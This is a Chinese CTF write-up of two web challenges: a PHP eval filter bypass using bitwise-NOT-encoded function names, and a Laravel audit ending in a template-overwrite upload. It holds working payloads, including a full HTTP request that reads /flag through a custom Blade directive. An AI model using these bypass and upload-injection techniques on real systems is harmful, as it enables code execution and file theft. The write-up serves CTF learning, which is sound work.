广东强网杯两道Web Writeup

   · ☕ 2 分钟
🏷️
  • #ctf
  • @level5师傅发在群里的题目,做了两道

    web4 php

    http://119.61.19.212:8082/index.php

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    
    <?php
    error_reporting(E_ALL^E_NOTICE^E_WARNING);
    function GetYourFlag(){
        echo file_get_contents("./flag.php");
    }
    
    if(isset($_GET['code'])){
        $code = $_GET['code'];
        //print(strlen($code));
        if(strlen($code)>27){ 
            die("Too Long.");
        }
    
        if(preg_match('/[a-zA-Z0-9_&^<>"\']+/',$_GET['code'])) {
            die("Not Allowed.");
        }
        @eval($_GET['code']);
    }else{
          highlight_file(__FILE__);
    }
    ?>
    

    过滤字符数字下划线等等 长度小于等于27 然后调用GetYourFlag()函数即可,可以用~按位取反

    1
    
    echo urlencode(~('GetYourFlag'));
    

    得到

    1
    
    %B8%9A%8B%A6%90%8A%8D%B9%93%9E%98
    

    然后函数需要再取反回来

    1
    
    ~(%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98)
    

    存到一个变量里,因为过滤,我们用中文来定义变量,我在这用

    1
    
    echo urlencode('中');	//%E4%B8%AD
    

    然后用变量存储我们取反回来的GetYourFlag函数,最后通过变量来调用这个函数

    1
    
    $%E4%B8%AD=~(%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98);$%E4%B8%AD();
    

    最后的payload

    view-source:http://119.61.19.212:8082/index.php?code=$%E4%B8%AD=~(%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98);$%E4%B8%AD();
    

    web5

    laravel的代码审计

    路由

    20190912093854

    app/Http/Controllers/UserController.php 注入

    20190912093943

    20190912094106

    密码解不出来,但是在database/factories/UserFactory.php这个工厂函数中给出来了

    20190912095222

    继续看 app/Http/Controllers/HomeController.php

    20190912094237

    登录后要从数据库中拿到key,然后才能上传文件,也就是进入HomeController@uploadss。传文件的文件名经过一层filecheck()过滤之后移动到视图模板的目录里,清晰了,通过上传覆盖原本的模板然后模板注入读flag。

    20190912094545

    正好/resources/views/auth/uploads/目录有一个template.blade.php模板,而路由中也有控制器去渲染这个模板。

    20190912094749

    20190912094834

    构造表单上传之后发现上传filecheck()过滤了很多东西,不能有php <字样。

    首先我们要知道laravel的blade模板是可以自定义php代码的,但是必须是如下格式

    1
    2
    3
    
    @php
        //
    @endphp
    

    但是过滤了php关键字,没办法,只能去扒一扒blade的文档了,然后发现了自定义模板标签 https://laravel.com/docs/5.8/blade#extending-blade

    20190912095812

    牛逼,直接@filedata('/flag’)就完事了。

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    
    POST /home/uploadss/NotAllow6171 HTTP/1.1
    Host: 119.61.19.212:8085
    Content-Length: 444
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: null
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvJNe9ABsnjeKGhDN
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: XSRF-TOKEN=eyJpdiI6IitoWjhwMm1ycmNTWFozSmZTTXJwXC9nPT0iLCJ2YWx1ZSI6IkllczhnNEZodldZbllTN0NmZDErR2I1eXF1bU9mV1wvYklManNuUnQ4YzhJcmlWQ09JVXJPXC9JNHZxVU0xRmdCY0RDbWJHelVwYjQyVjdXQ1FHVlFMMlE9PSIsIm1hYyI6IjNmMGUzZTEwYTA2ZDA2MjJjMDg4OTY5NTI4NDJjNTk2YmQ4N2U4NWYxY2E2ZjU3YWEwNTAwODllMzIyYTU4ZjAifQ%3D%3D; laravel_session=eyJpdiI6InRhRzZmenBJSmFLNHhrb0RlUE5OdVE9PSIsInZhbHVlIjoiZ01qK2JpQURoRHgxbFVrcGc4TE9PK2kycGxSTjlNRzkwK21uVDUxa3UyTW5JYXpIcWJaY2pYbXQwNDc0dklkemNjRmR0aFhZcllmTkRvQXpVUlR3d3c9PSIsIm1hYyI6IjAwMjVkODA3YmY5NDU1Y2U5MDMyMWMwMTI1MTcyMmQ1YTU5NWQzMTE0MGMxMzc0ZWM1NDU4YzQ5MWIyZjI5YTgifQ%3D%3D
    Connection: close
    
    ------WebKitFormBoundaryvJNe9ABsnjeKGhDN
    Content-Disposition: form-data; name="_token"
    
    Z7VZ7FXfNzuzETtQrZ7DeAZCFtbkQl9L8e7ptVin
    ------WebKitFormBoundaryvJNe9ABsnjeKGhDN
    Content-Disposition: form-data; name="files"; filename="template.blade.php"
    Content-Type: text/html
    
    @filedata('/flag')
    ------WebKitFormBoundaryvJNe9ABsnjeKGhDN
    
    Content-Disposition: form-data; name="submit"
    
    Submit
    ------WebKitFormBoundaryvJNe9ABsnjeKGhDN--
    

    文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。

    您的鼓励是我最大的动力
    alipay QR Code
    wechat QR Code

    目录